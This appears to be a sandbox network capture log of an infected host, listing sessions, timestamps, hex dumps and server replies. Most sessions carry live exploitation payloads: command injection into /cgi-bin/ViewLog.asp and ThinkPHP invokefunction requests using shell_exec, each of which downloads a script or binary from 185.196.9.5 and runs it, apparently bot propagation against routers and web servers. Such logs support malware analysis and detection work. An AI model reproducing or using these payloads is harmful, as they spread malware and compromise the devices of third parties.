Feb 25, 2024 19:05:40.068675041 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:44.676548958 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1253	192.168.2.15	35544	94.120.154.150	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:36.345261097 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1254	192.168.2.15	54322	95.216.210.107	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:38.348850965 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:38.546241999 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:05:38 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1255	192.168.2.15	44390	95.101.81.168	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:38.361943960 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:38.571933031 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Sun, 25 Feb 2024 18:05:38 GMT Date: Sun, 25 Feb 2024 18:05:38 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 63 39 31 30 30 32 26 23 34 36 3b 31 37 30 38 38 38 34 33 33 38 26 23 34 36 3b 32 65 62 36 64 32 64 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.ac91002.1708884338.2eb6d2de</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1256	192.168.2.15	58806	95.0.0.235	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:38.382857084 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:38.613327980 CET	321	IN	HTTP/1.1 400 Bad Request Server: nginx/1.22.0 Date: Sun, 25 Feb 2024 18:05:38 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.0</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1257	192.168.2.15	55176	94.242.229.128	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:38.726560116 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1258	192.168.2.15	59210	95.216.36.9	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:38.797540903 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1259	192.168.2.15	40966	85.73.145.204	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:38.820574045 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1260	192.168.2.15	35194	112.125.251.3	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:38.851455927 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:39.156198978 CET	502	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sun, 25 Feb 2024 18:06:01 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1261	192.168.2.15	34116	112.95.250.53	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:38.876823902 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:40.580542088 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:42.596487999 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:46.724493027 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
1262	192.168.2.15	45242	88.214.193.49	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:38.950052023 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:39.058425903 CET	273	IN	HTTP/1.1 505 HTTP Version Not Supported Server: akka-http/10.1.11 Date: Sun, 25 Feb 2024 18:05:39 GMT Connection: close Content-Type: text/plain; charset=UTF-8 Content-Length: 74 Data Raw: 54 68 65 20 73 65 72 76 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 74 68 65 20 48 54 54 50 20 70 72 6f 74 6f 63 6f 6c 20 76 65 72 73 69 6f 6e 20 75 73 65 64 20 69 6e 20 74 68 65 20 72 65 71 75 65 73 74 2e Data Ascii: The server does not support the HTTP protocol version used in the request.

Session ID	Source IP	Source Port	Destination IP	Destination Port
1263	192.168.2.15	58732	94.187.106.179	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:39.033202887 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1264	192.168.2.15	47864	94.120.144.56	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:39.049664974 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1265	192.168.2.15	41606	88.221.230.126	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:39.066245079 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:39.282124996 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:05:39 GMT Date: Sun, 25 Feb 2024 18:05:39 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 64 39 62 31 37 30 32 26 23 34 36 3b 31 37 30 38 38 38 34 33 33 39 26 23 34 36 3b 33 36 32 37 37 61 36 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.ad9b1702.1708884339.36277a60</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1266	192.168.2.15	36940	94.123.43.111	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:39.074508905 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1267	192.168.2.15	34514	88.78.75.228	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:39.078670025 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:39.330485106 CET	600	IN	Data Raw: 55 4e 4b 4e 4f 57 4e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 74 68 74 74 70 64 2f 32 2e 32 35 62 20 32 39 64 65 63 32 30 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 Data Ascii: UNKNOWN 400 Bad RequestServer: thttpd/2.25b 29dec2003Content-Type: text/html; charset="UTF-8"Date: Sun, 25 Feb 2024 18:05:38 GMTLast-Modified: Sun, 25 Feb 2024 18:05:38 GMTAccept-Ranges: bytesConnection: closeCache-Control: no-ca

Session ID	Source IP	Source Port	Destination IP	Destination Port
1268	192.168.2.15	34530	88.78.75.228	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:39.551048994 CET	600	IN	Data Raw: 55 4e 4b 4e 4f 57 4e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 74 68 74 74 70 64 2f 32 2e 32 35 62 20 32 39 64 65 63 32 30 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 Data Ascii: UNKNOWN 400 Bad RequestServer: thttpd/2.25b 29dec2003Content-Type: text/html; charset="UTF-8"Date: Sun, 25 Feb 2024 18:05:39 GMTLast-Modified: Sun, 25 Feb 2024 18:05:39 GMTAccept-Ranges: bytesConnection: closeCache-Control: no-ca

Session ID	Source IP	Source Port	Destination IP	Destination Port
1269	192.168.2.15	52376	88.99.226.116	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:41.499169111 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:41.682773113 CET	181	IN	HTTP/1.0 400 Bad request cache-control: no-cache content-type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1270	192.168.2.15	48200	62.20.248.2	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:41.525537968 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:42.564663887 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:42.755964041 CET	518	IN	HTTP/1.0 401 Unauthorized Server: uhttpd/1.0.0 Date: Sun, 25 Feb 2024 18:05:42 GMT WWW-Authenticate: Basic realm="NETGEAR wnr2200" Content-Type: text/html; charset="UTF-8" Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 4d 45 54 41 20 68 74 74 70 2d 65 71 75 69 76 3d 27 50 72 61 67 6d 61 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 2d 63 61 63 68 65 27 3e 3c 4d 45 54 41 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 2d 63 61 63 68 65 27 3e 3c 54 49 54 4c 45 3e 20 34 30 31 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 3c 2f 54 49 54 4c 45 3e 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 6a 61 76 61 73 63 72 69 70 74 20 74 79 70 65 3d 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3e 0a 66 75 6e 63 74 69 6f 6e 20 63 61 6e 63 65 6c 65 76 65 6e 74 28 29 0a 7b 0a 09 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 2f 75 6e 61 75 74 68 2e 63 67 69 27 3b 0a 7d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 20 6f 6e 6c 6f 61 64 3d 63 61 6e 63 65 6c 65 76 65 6e 74 28 29 3e 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e Data Ascii: <HTML><HEAD><META http-equiv='Pragma' content='no-cache'><META http-equiv='Cache-Control' content='no-cache'><TITLE> 401 Authorization</TITLE><script language=javascript type=text/javascript>function cancelevent(){location.href='/unauth.cgi';}</script></HEAD><BODY onload=cancelevent()></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1271	192.168.2.15	47920	62.28.104.233	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:41.529162884 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
